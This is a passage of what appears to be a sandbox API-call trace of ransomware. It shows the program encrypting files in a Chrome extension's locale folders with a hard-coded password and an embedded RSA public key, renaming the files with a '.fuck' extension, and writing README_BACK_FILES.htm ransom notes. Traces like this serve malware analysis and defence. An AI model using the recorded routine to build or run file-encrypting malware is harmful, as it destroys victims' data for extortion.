dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6ffc8) returned 1 [0260.499] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6ffc8, dwCertEncodingType=0x1, pInfo=0x2eb28a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb28d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb28d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d2c0) returned 1 [0260.499] CryptEncrypt (in: hKey=0x2e7d2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.499] CryptEncrypt (in: hKey=0x2e7d2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6f528*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6f528*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.499] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6f528*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6f528*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.500] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xee, lpOverlapped=0x0) returned 1 [0260.501] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xee, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.501] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.501] CloseHandle (hObject=0x5d64) returned 1 [0260.501] CloseHandle (hObject=0x5d5c) returned 1 [0260.501] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0260.504] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0260.504] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0260.505] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0260.506] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.506] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.506] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.506] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.506] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.506] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0260.506] AreFileApisANSI () returned 1 [0260.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.506] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.507] GetFileType (hFile=0x5d60) returned 0x1 [0260.507] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.509] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.509] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.509] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.509] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.509] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.509] GetLastError () returned 0x0 [0260.509] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json")) returned 0x20 [0260.509] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0260.510] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.510] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.512] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.512] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.514] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.514] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.514] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.514] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.514] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.515] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.515] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f5b0) returned 1 [0260.515] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f5b0, dwCertEncodingType=0x1, pInfo=0x2eb2080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb20b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb20b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d740) returned 1 [0260.515] CryptEncrypt (in: hKey=0x2e7d740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.515] CryptEncrypt (in: hKey=0x2e7d740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70050*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70050*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70050*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70050*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.516] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xe8, lpOverlapped=0x0) returned 1 [0260.517] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe8, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.517] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.518] CloseHandle (hObject=0x5d5c) returned 1 [0260.518] CloseHandle (hObject=0x5d64) returned 1 [0260.518] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0260.520] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0260.521] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0260.522] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0260.524] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.524] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.524] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.524] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.524] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.524] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0260.524] AreFileApisANSI () returned 1 [0260.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.524] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.525] GetFileType (hFile=0x5d60) returned 0x1 [0260.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.526] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.526] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.526] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.526] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.526] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.526] GetLastError () returned 0x0 [0260.526] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json")) returned 0x20 [0260.526] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0260.527] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.527] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.534] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.534] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.536] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.537] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.537] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.537] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.537] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.537] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.537] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f638) returned 1 [0260.537] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f638, dwCertEncodingType=0x1, pInfo=0x2eb2b10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2b40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2b48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d5c0) returned 1 [0260.537] CryptEncrypt (in: hKey=0x2e7d5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.537] CryptEncrypt (in: hKey=0x2e7d5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e700d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e700d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.538] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e700d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e700d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.539] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0260.546] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.546] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.546] CloseHandle (hObject=0x5d64) returned 1 [0260.546] CloseHandle (hObject=0x5d5c) returned 1 [0260.546] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0260.549] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0260.550] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.gsg")) returned 1 [0260.551] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: 